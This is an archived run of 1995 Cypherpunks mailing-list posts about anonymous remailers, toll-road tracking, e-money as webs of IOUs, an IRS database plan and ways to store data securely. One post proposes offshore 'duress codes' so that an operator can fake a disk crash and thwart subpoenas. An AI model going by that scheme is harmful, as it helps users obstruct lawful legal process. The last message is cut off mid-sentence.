Message-ID: <199501210610.WAA24523@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Northrop wrote:

> Here in Seattle there is a proposal to turn a couple of traffic chokepoints
> into toll roads.  Because a toll plaza would back things up even worse, I'm
...
> The downside is that it'll not be designed with privacy in mind at all, and
> will eventually have this pesky database of who went by the toll booth and
> when.  We all know that old databases never die, they just get put on tape and
> stuffed in a box, to wait for someone with a curious streak to come by.  This

No doubt the various cities and local governments can raise extra
revenue by selling the tracking data to the IRS for their new
"Compliance 2000" program, to FinCEN to see if suspicious travel
patterns are being engaged in, to the War on Some Drugs soldiers to
see if the car is deemed to be a drug carrier, and so on. Even better,
women seeking abortions, for example, could be denied access to the
toll roads that are known to lead to the evil abortionists! The
possibilities are endless.

All of this is old news, in that Brunner warned of ubiquitous
computers in "The Shockwave Rider," and Chaum explicitly dealt with the
threat of position tracking in his proposal for digital, untraceable
cash.

Lucky Green demonstrated at the last CP meeting a toll payment card
that uses Digicash.  About the size of a credit card, it handles the
payment but is unlinkable to driver or car ID.

Cities won't use this technology unless customers demand it. Of
course, cities don't view road users as customers who can take their
business elsewhere.

I don't expect very widespread use of digicash.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 20:14:25 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510100ab4639b0ffe3@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Okay. Here's my 2-bits.
I run on the MacOS, but how hard could it be to port this code? If anyone
is willing to do this (I assume it's not written in Pascal, which is my
only language of any consequence), I will run it. It will be available from
now until I graduate in '98 during the school months. If anyone wants to
try this from scratch, we could try it in Pascal. I would be very willing
to do the developing as well as host a discussion list for anyone who jumps
in.
I will take no response to mean that all options are not going to be
pursued, and that this discussion is just that, a discussion.

- -Kyraden

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 20 Jan 95 19:19:28 PST
To: Greg Broiles <greg@ideath.goldenbear.com>
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <9501210318.AA05326@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Greg Broiles <greg@ideath.goldenbear.com>
    Date: Fri, 20 Jan 1995 17:28:58 -0800 (PST)
    
    Tim May wrote:
    
    > I am waiting for such services to be actually, formally, solidly
    > announced, not just casual remarks that it might be possible. And of
    > course the software should be "ready to wear," port-a-potty, so that
    > the remailer account owner does nothing more than pay for the account.
    
    In this model, who deals with mailbombs/spams/requests for address blocks?

With sameer's recently announced RIAB, it seems quite reasonable that
Tim could follow the instructions that were sent out and when he gets
to this one:

 3) If you wish, you can setup a .forward file to point to mailfilters
 or to another account. 

then he could do this:

 % echo 'tcmay@netcom.com' > ~/.forward

and then he would never have to log into c2 again.

This is not quite at the level of what Tim explicitly stated:
``remailer account owner does nothing more than pay for the
account.'', but it's about as close as one could hope for while
addressing your concerns.

Of course, Tim could adopt `hands off' administration by doing any of
the following:
 - forwarding to /dev/null
 - using auto-bounce script
 - forwarding to tcmay@netcom.com, but ignoring all mail related to
   his remailer.

It might be a good idea to check that sameer thinks this is ok.  It's
bound to piss people off more than remailers with a more interactive
administrator.  It basically says that mail bombs and spams are
acceptable and requests are pointless.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Dalai Lama <dan@chopin.udel.edu>
Date: Fri, 20 Jan 95 19:20:06 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501201626.AA03495@firefly.prairienet.org>
Message-ID: <Pine.SOL.3.91.950120221331.8346B-100000@chopin.udel.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995, Jeff Licquia wrote:

> I envision a setup right now where you could (if you wanted) type "remailer"
> at the DOS prompt to bring the remailer up.  The screen would show a
> monitor-type program, with a menu option to "R)eboot" to DOS again (or you
> could just hit Ctrl-Alt-Del).
> 
So why not just implement remailers for the DOS/OS/2/Windows NT crowd?  
I think we'd see more remailers if people didn't need to leave their OS 
of choice just to run UNIX and a remailer.  OS/2 and Windows NT are 
stable platforms.  If there was little performance impact caused by an 
OS/2 remailer process, I'd be more than willing to let it run.
	Is anyone working on porting remailer code to one of the 
IBM/Microsoft operating systems?  Perhaps I'll get cracking on an OS/2 
version....
					Dan

--
[Here's something for those friendly mail scanners...]
hack phreak crack assassinate president virus espionage clinton honduras
root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:38:45 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510103ab46516c92d0@[152.97.12.101]>
Message-ID: <199501210637.WAA28437@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rhys Kyraden wrote:

> Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week
> (during school months!;-)) The server you just mailed to is on this
> machine.

If it's up nearly all the time (23.8 hours a day), accepting mail,
then I see no reason your machine can't be a remailer. If, however, it
gets turned off, taken home for the holidays, isn't always in a state
to accept mail, then your remailer will get pinged and downchecked by
the testing programs. 

(And you won't easily be able to arrange for multiple "accounts" on the
machine, given the sorry state of such things on the Mac.)

> I agree that the Mac lacks some of the more powerful Unix features, namely
> preemptive multitasking, but I also believe that, at least with the newer
> Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck
> Shotton's MacHTTP WWW server for the Mac? An excellent piece of software
...

Others may know more about this means for running a remailer on a Mac.
I do know that Scott Collins, a Mac programming wizard who works for
Apple, chose to run his remailer on Netcom's Unix machines...he would
be a person to ask about what you hope to do.

> I thought that it was in Perl. I have tried pulling Unix Perl scripts and
> running them under MacPerl, but it doesn't quite do it. In fact, it usually
> doesn't do anything but spew errors back at you.

I can't help here. Try the Perl discussion groups...there's probably
a FAQ on both Perl and MacPerl that discusses incompatibilities and issues.

As an aside, maybe working on another project, one that is actually
new territory, would be a more interesting and useful thing to do.
With a 660AV, and the various audio tools available, a Mac version of
PGP Phone might be a lot more interesting.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Fri, 20 Jan 95 19:57:18 PST
To: cypherpunks@toad.com
Subject: Hakim Bey URL, etc.
Message-ID: <v01510100ab462c6b6caf@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


The URL for the Hakim Bey web site (someone might have already posted this) is:
http://www.uio.no:80/~mwatz/bey/


Excerpt from the Hakim Bey interview in "Axcess" magazine (conducted last
summer):

"I have to admit I felt a certain intense interest, perhaps even amounting
to a potential enthusiasm, when this tech was first being discussed," Bey
told me.  "I'd read William Gibson like the rest of us, and I certainly
understood his dystopian point, but nevertheless, when Tim Leary and people
like that began to get enthusiastic, I had to investigate on that level.  I
haven't seen much evidence that what Uncle Tim thought was going to happen
is really happening.  Once again, any technology could be democratic if it
were distributed, you know what I mean?  It's a simple Marxist thing about
means of production.  There's nothing inherently authoritarian--at least at
first glance--to any technology, although one could argue about how
technology then shapes the society that has already shaped the technology
in a kind of feedback loop that can move towards greater and greater
authoritarianism or lack of autonomy.  The potential for what, back in the
50's and 60's, people were calling electronic democracy, is obviously still
there as a potential structure.  You can see certain elements of it in the
Net, but when you're talking about the high tech involved in virtual
reality you're really talking about something that is not accessible to most
people.  And I think it probably never will be.  There's never going to be
any cheap VR kit that's going to allow a dock worker in Manila to get on
some kind of cyberspace Internet, much less a dock worker in Atlanta--or
me, for example."

Bey was equally gloomy about the future of the Internet.  "My impression is
that 90 per cent of what goes out over it is completely unrelated to any
kind of freedom interests, autonomy proposals or projects, or struggles for
genuine non-hierarchical, non-authoritarian group dynamic.  Most of it is
just chit-chat--banal chit-chat that could just as easily be carried out
over an old-fashioned party line phone."

Unabashed in my online addiction, I couldn't help but ask if he saw _any_
way to realize the internet as a T.A.Z.

"I'm led to believe, through conversations with people who are much more
techie and active than I am, that cypher--unbreakable code--is the key.  So
the cypherpunks are the people to keep an eye on at this moment.  They tend
to be the ones who are most active around freedom of speech
issues...whether legal or extra-legal."  Even so, Bey felt that the powers
that be will never allow the "Information Superhighway" to develop
unchecked.

"I think Clipper was a declaration of war on the Net.  The fact that the
egg is on their face, because within ten minutes some hacker figured out
how to beat the Clipper, is an indication of--oh, let's call it an area of
chaos.  Within areas of chaos, either horrible destruction and disease and
death occur.  Or, if you're flowing the right way, and if all hearts are
beating in unison to a certain degree, then that area of chaos can become
the T.A.Z.  Now I've said over and over again that there's no such thing as
a T.A.Z. that's only on the Net, and I maintain that that's true.  In order
to have autonomy, you have to have physicality.  Autonomy is not something
that can only exist in the imagination or in the world of images.  I think
that it involves the entirety, the whole axial being, and that is rooted in
the earth and concerns physicality, materiality, the body--mortality, if
you like--as contrasted to the spurious immortality of cyberspace.  But I
still maintain that, at least in theory, the Net could be an adjunct to the
T.A.Z., could be a tool or a weapon, even, if you want to look at it that
way, for the construction of the T.A.Z."

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 23:14:40 PST
To: cypherpunks@toad.com
Subject: Data Vaults (vs. Data Havens)
In-Reply-To: <2778lyczB0I7075yn@netcom.com>
Message-ID: <199501210713.XAA17754@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Bostick wrote:

> Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having
> crucial data encoded into graphical images and tattooed onto the skins
> of beach bums.  
> 
> I've heard of worse ideas. . . .

She's a better novelist than an information theorist...

All the talk recently about data havens [secure storage variety] got
me to thinking. 

(In case you're wondering, I specified [secure storage variety]
because there seems to be some confusion, or at least conflation, about
what a "data haven" does. Is it for selling illegal data publicly?
Is it for storing sensitive material, privately? Something else?)

Anyway, for securely storing data that one wishes to be able to later
retrieve, but wishes thieves and authorities not to have, here are
some major possibilities:

1. The old stand-by. Keep copies of data at a friend's house. (This is
what I do, to guard against fires or thefts or ransackings by the
Thought Police.)

(Knowing where the stuff is stored is part of the "key" to getting it,
and only adds a few bits to the overall key length in most cases. That
is, not much security against a capable adversary. But fires are
usually pretty dumb, and cops not much smarter, so this works pretty
well.)

2. True secure storage, using a commercial service. Mineshafts, salt
domes, concrete buildings, etc. are commonly used for this. Corporate
records, etc. Pay a fee, store your files, etc. Of course, a subpoena
will get the data posthaste.

2A. Offshore secure storage, in a jurisdiction that will not honor
subpoenas from one's country. Lots of obvious issues here: bribery of
the vault, pressures applied locally, black bag jobs, etc.

3. Encryption, with either local or remote storage. 

3A. Encrypted, but local. This is by far the most common scenario, the
one most of us use all the time. Can the authorities force disclosure
of a key? I have a *lot* on this in my FAQ, so I won't repeat it here.
Basic conclusion: has not been tested, but it is unlikely that a
defendant who claims to have "forgotten" his passphrase, or who just
clams up, will get zapped for this, per se.

3B. Encrypted, offshore. Actually, this is similar to the above. If
the court can compel decryption, it can certainly compel retrieval
of files. And if it can't compel decryption, the files are no less
safe if stored locally.

(But I admit that the realities are not so simple. Offshore storage
offers some additional advantages. For one, "duress codes" that tell the
site owner in Belize that the person requesting the material, in LA,
is actually under duress. The site operator can then report back a
convenient "disk crash" and the authorities will be screwed. This
stratagem is harder to do cleanly in the U.S., for example, where the
site owner might be subpoenaed.)

4. Purloined Letter. Hide it in plain sight. Steganography, in one of
your hundreds of DATs, or in GIFs and PICTs, etc. Without the key,
they won't know where it is.

(I've been pushing this since 1988, in postings on sci.crypt and
elsewhere. Romana Machado and others have implemented the image-based
version.) 

5. A variant is to use ftp sites. Encrypt the data and place it in an
ftp site that allows write access. Use remailers if you wish. Then,
your secret data is stored in encrypted, unidentifiable form on
someone else's computer, retrievable by you later.

(Lots of issues here. Our never-realized "anonymous anonymous ftp"
capability could mean the storer would not even know what continent
the site was on.)

Well, these are just some of the ideas. Me, I stick to simply
encrypting sensitive files and keeping a couple of copies in safe
places. 

I don't think we ought to call these uses "data havens." Save the term
"data haven" for those places, in cyberspace or in real space, that
sell access to Nazi medical experiments, that sell illegal birth
control information, that buy weapons secrets, and so on. 

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Master-X <hodges@roadrunner.com>
Date: Fri, 20 Jan 95 22:13:13 PST
To: cypherpunks@toad.com
Subject: Send Me The Stuff
Message-ID: <199501202316.XAA22586@beep.roadrunner.com>
MIME-Version: 1.0
Content-Type: text/plain


Please e-mail me with the stuff.
      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@phantom.com>
Date: Fri, 20 Jan 95 20:26:07 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201845.AA09218@toad.com>
Message-ID: <Pine.3.89.9501202321.A4231-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



A copy of the IRS notice and EPIC's response are available at cpsr.org 
/cpsr/privacy/epic/. The article below ran on the Knight Ridder newswire 
and appeared in at least 20 newspapers. We got a call late tonight from 
the IRS saying they were yanking the proposal.

Dave



On Fri, 20 Jan 1995 xpat@vm1.spcs.umn.edu wrote:

> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> 
> "IRS plans to collect more data on individuals to nab tax cheats"
> 
> a "vast expansion of secret computer database of information it
> keeps on virtually all Americans" will include "credit reports,
> news stories, tips from informants,  and real estate, motor vehicle
> and child support records, plus conventional Govt financial data"
> 
> "Any individual who has business and/or financial activities can
> expect upgraded agency reports to be put to IRS auditors promptly"
> 
> Here's the kicker: "Although agency officials concede that some of
> the data collected will be inaccurate, taxpayers will not be allowed
> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> ^^^^^^^^^^^^^^^^^^^^^^^
> So much for the FOIA.
> 
> ------------------------------------------------------------------------
> P M Dierking |
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 21:51:21 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <v01510103ab46516c92d0@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


>But is your Mac on the Internet on a more or less continuous basis? A
>remailer that only works when the owner happens to log on to collect
>his mail is not terribly useful (though not useless, as others have
>also noted....just a "very unpredictable lag time" remailer, sort of
>the "surface mail" of e-mail).

Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week
(during school months!;-)) The server you just mailed to is on this
machine.

>It happens that the Net is mainly built up of Unix boxes, hence the
>focus here on Unix. OS/2, Windows, and Mac boxes will be used
>increasingly for constant connection applications, so the idea has
>merit, long term.

I understand this, and am trying my best to cope. I am currently in the
process of developing a name server for the Mac, because the Mac has a lot
against it when it comes to being a real entity on the 'Net.

>(Another nit: the Mac, which is what I also use, currently lacks
>preemptive multitasking. Thus, if one's Mac is playing a multimedia
>CD-ROM when new mail comes in, it likely won't get remailed until the
>first app quits or is manually switched out. (Yeah, a few things like
>print drivers can run in background, and maybe the new TIA emulators
>can trick the OS into processing SLIP or PPP mail in the background,
>but who knows?) The consensus is that the Mac is powerful, but it
>ain't cut out yet to be a Unix box.)

I agree that the Mac lacks some of the more powerful Unix features, namely
preemptive multitasking, but I also believe that, at least with the newer
Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck
Shotton's MacHTTP WWW server for the Mac? An excellent piece of software
that gives literally on demand, and at least with my copy, it is always in
the background. Really about the only thing that cuts out CPU timesharing
is multimedia, mostly 3D graphics games and highly intense graphics
software, neither of which I use (much!;-))

>The language is a lesser deal. Remember that Eric Hughes knocked out
>the first remailer in Perl in a few days, and MacPerl exists for the
>Mac. Going to Pascal would probably be more trouble than it's worth.

I thought that it was in Perl. I have tried pulling Unix Perl scripts and
running them under MacPerl, but it doesn't quite do it. In fact, it usually
doesn't do anything but spew errors back at you.

>But the most important feature to have is a solid, reliable connection
>to the Net. A computer that gets taken to classes, is not connected to
>the Net, etc., is not very useful as a remailer.

As I noted, I have a constant 56k line in/ out. And mine never moves...
it's a bit large... mine is a Quadra 660av (ugh).

>(The key is not that a remailer can sometimes remail, but that it can
>be counted on to be part of chain without the mail getting "dropped on
>the floor.")
>
>--Tim May

As far as I can tell, and maybe you have other knowledge on this, my
situation should work, assuming I can run the software. What do you think?
Should the remailer Perl script run under MacPerl?

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 3rd! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@vox.xs4all.nl (Alex de Joode)
Date: Sat, 21 Jan 95 03:02:59 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <FR69yc1w165w@vox.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


jalicqui@prairienet.org (Jeff Licquia) writes:

: Would it be better if you didn't have to dedicate your box to Linux, but
: just ran it every so often when you weren't playing with Codewright?  If you
: had some store-and-forward mail system (like UUCP or Fido), you wouldn't
: need to say goodbye to DOS/Windows.

Patrick Oonk <kafka@xs4all.nl> has written a remailer for Waffle,
(which is a UUCP system), I use that for vox.xs4all.nl . It works
under DOS. 

Regards,

Alex de Joode
usura@replay.com
http://xs4all.nl/~usura




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Sat, 21 Jan 95 10:25:46 PST
To: cyperpunks@toad.com
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <VH6D1c2w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@netcom.com (Timothy C. May) writes:

> > data havens. I haven't bothered to hunt for Lance's address, which is not
> > given, but really I thought someone as prominent a SysLawyer as him would
> > be clued in. Nor have I found the time to send WIRED a letter. 
> 
> First, I want to know how Rishab, in India, gets "Wired" so early (or
> why I, right next to Silicon Valley, get it so late). He's mentioned

I used to get it three months late, as TNT was doing something really weird
to WIRED. I screamed. So they send it express hot off the press, which has
worked for two issues so far.

> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of

No, I don't think he's a lawyer, but he wrote SysLaw which is widely hyped
as _the_ law book for BBS sysops. It's actually not that good - the EFF
recommends another one the name of which I've forgotten. 


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sat, 21 Jan 95 00:36:26 PST
To: sameer <cypherpunks@toad.com
Subject: Re: Remailer In a Box available for beta testing
In-Reply-To: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>
Message-ID: <X2C8lKjqRWmA077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>, you wrote:
> (Sameer uses PGP)

> 3) If you wish, you can setup a .forward file to point to mailfilters
> or to another account.
>
> 4) Run the program /usr/local/lib/boxed-remailer/install_remail. The
> remailer will be installed, and non-remailed mail will be acted upon
> according to how the account was setup before you ran the program.
>
> 5) Answer the questions, they should be pretty simple.
>
> 	Once an account is created there is a one week free grace period.
> If you'd like to continue the account you can pay for it.
>
> 	If you have problems and suggestions, make sure you mail me, and
> I'll fix it. This is still in beta testing, so if you have problems I won't
> disable the account waiting for payment until the problems are fixed.
>

One minor question: is it possible to set it up so that it is not a final
hop remailer? In other words the remailer is set up to pass its mail on to
hop remailer. In other words the remailer is set up to pass its mail on to
another remailer which is the final destination (preferably non-U.S.) If
so, I'm in. I've already got my account on c2 doing three things, what's
one more. If we could make this possible, it could really propagate
remailers as it removes some of the liability from those who can't afford
it.

I would love to run a final hop remailer, unfortunately financially I
barely have enough cash to keep on the net, let alone pay for a lawyer if
needed. Hopefully this is only temporary, (wifey finally found a job, now
it's catch-up time) but I'm unfortunately getting used to it.


Sam
- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
     Any two philosophers can tell each other all they know in two hours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 23:08:04 PST
To: adamfast@seanet.com (Adam Feuer)
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.NXT.3.91.950120171115.12961A-100000@kisa>
Message-ID: <199501210707.CAA29137@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


adamfast@seanet.com wrote:
|   well, one way of doing it is LETS, the Local Exchange Trading System-- a
| non-computerized way of exchanging value in a community. it doesn't
| exactly use money. there are thousands of LETS's worldwide, i've never


        LETS seem to have little use for anonymity or privacy.  They
may also involve substantial risks of inflation/devaluation; I'm
discussing this with Michael Linton on www-buyinfo.
 
(www-buyinfo-request@ALLEGRA.ATT.COM)
 
 
Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 20 Jan 95 14:37:02 PST
To: cypherpunks@toad.com
Subject: Netherlands crypto ban?
Message-ID: <gate.HRP0yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



What's the update on the move to ban private crypto in Holland? Last I remember
there were trial balloons, but nothing happened.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 20 Jan 95 14:23:56 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <gate.1uq0yc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Tim urges recently that we need to do something about the "remailer crisis."

I remember Sameer once mentioning that he could set up remailer-in-a-box 
accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore
indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows
'remail-to-yourself' blind-server accounts for $10 / meg or something. That's
probably a bit expensive for a sponsor of a public remailer (any stats on 
average remailer traffic?). I never did hear any more from sameer or anyone
else about remailers-in-boxed-accounts. I for one would be willing to 'sponsor'
a remailer account on any system with a small fee - I can't run my own as my 
private site looks at the world through PPP.

I suggest that 'sponsored' remailers are a better way of making remailers
economically viable for people like Sameer, who are the real, if not nominal,
administrators. Though I hardly use remailers, those who do would probably
make better (and more easily executed) use of their money if they sponsor
remailer accounts on Cypherpunk ISPs like c2, rather than pay a (truenamed, 
legally vulnerable) operator for any single remailer.

Sameer's blind-server code can come in use to make any link between the 
sponsor and her sponsored account very hard to detect.

The advantages of sponsoring remailer-site operators to create remailing
accounts, rather than pay an individual remailer operator, are many:
1. innocent until proven guilty - presumably sponsors do use remailers a lot;
   but not necessarily. So the payment transaction can be via truename, rather
   than via some complicated anonymous means, and still leave the sponsor
   unimplicated
2. legal - an operator of a single remailer is vulnerable - technically, if
   not root, and legally otherwise. an administrator of a Cypherpunk ISP is
   not, and does not have the legal right to monitor a customer's traffic,
   and with blind-servers even detailed logging doesn't lead back to the
   owner of an account, the sponsor, from any _specific_ remailer (though
   a pool of sponsors exists for a pool of remailer accounts)
3. technical - it's not possible to ban a single remailer, as there may be 
   _many_ on a site. If the site is much more than just remailers, it's not
   really possible to ban the entire site.
4. traffic analysis - more remailer addresses will make traffic analysis
   harder, and chaining more fun - you could chain through multiple accounts
   on a single site with little loss in reliability (though you'll still want
   to go through more sites)
5. remailer explosion - more reliable remailers (due to the '-in-a-box'), more 
   users, wider distribution
   

Comments?


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Sat, 21 Jan 95 00:09:44 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501210809.DAA12896@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Fri, 20 Jan 1995 19:36:34 -0500
> From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
> 
> Certainly, that's what money is after all. Pretty much.  But how are you
> going to transfer these IOUs electronically in a way that is relatively
> fraud-proof?  [...]

  By only trading with trusted partners.  Read on...

> And of course, if you want to use these certificates of value anonymously,
> which is what is required to pay for an anon remailer, there are some
> slightly more stringent requirements. The right kind of ecash protocol can
> still handle it.  But Carol probably shouldn't be paying for a remailer in
> CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a
> big spender that CarolBucks are in wide circulation and used by lots of
> people other than Carol.  Which I guess is possible in your system.

  If the remailer operator trusts Carol, then Carol and the Op can
exchange Op-IOU's for money, or Carol-IOU's for Op-IOU's.  (This is
the base case of the induction for you math geeks.)  Carol can use the
Op-IOU's directly with the Op or 'sell' them to people who want to do
business with the Op.

  If the remailer operator doesn't trust Carol, but there is a chain
of trust from Carol to the remailer operator, then Carol can get IOUs
from someone which the remailer operator does trust.  Call them
Jo-IOUs.  To do this Carol asks Pat who asks ... who asks Jo for an
IOU worth $32.  Carol gives Pat a Carol-IOU worth $32(+transaction fee
if Pat is a greedy soul) in exchange for which Pat gives Carol the
Jo-IOU worth $32 (which Carol got from Pat (which Pat got from some
place only Pat knows for sure)).

  IOU swaps will probably be done under the cover of encryption.
Swaps can also be done with a nice ecash system like Chaum and
Brandt(sp?) have proposed.  But I am not sure it is required.

  Anonymity can come also from the chain of IOU swaps, in the same way
remailers produce anonymity -- each person neglects to tell any others
for whom they carry out IOU swaps.  Sure Pat knows Carol wants a Jo
IOU, but Pat doesn't know why.  Jo could figure out that Jo's IOU went
out to W.Smith, and came back from V.Jones but can't make any
conclusion about whether W. and V. are trading partners or not.  It
would take a conspiracy of each person along the swap path to expose
the real trade.  Alternatively the buyer or seller can out the
transaction.  (But suppose they only know each other via some
anonymous email pool...)

  And privacy (from other than your trading partners) comes from using
encryption during each IOU swap.

  But if you don't trust your trading partners enough to keep quiet
about who you are, by all means use an untraceable ecash system.
(There are other advantages to using blind signatures anyway.)

> A pseudo-anarchist non-state-supported debt system would work fine, but you
> still need a mechanism to transfer your certificates of value, whether they

  Well...  TackyTokens, and a little bit (ha!) of client code (start
with Sameer's?) ought to do the trick.  (So perhaps the original
message's subject ought to have been "Why Ebanks?  Why not a web of
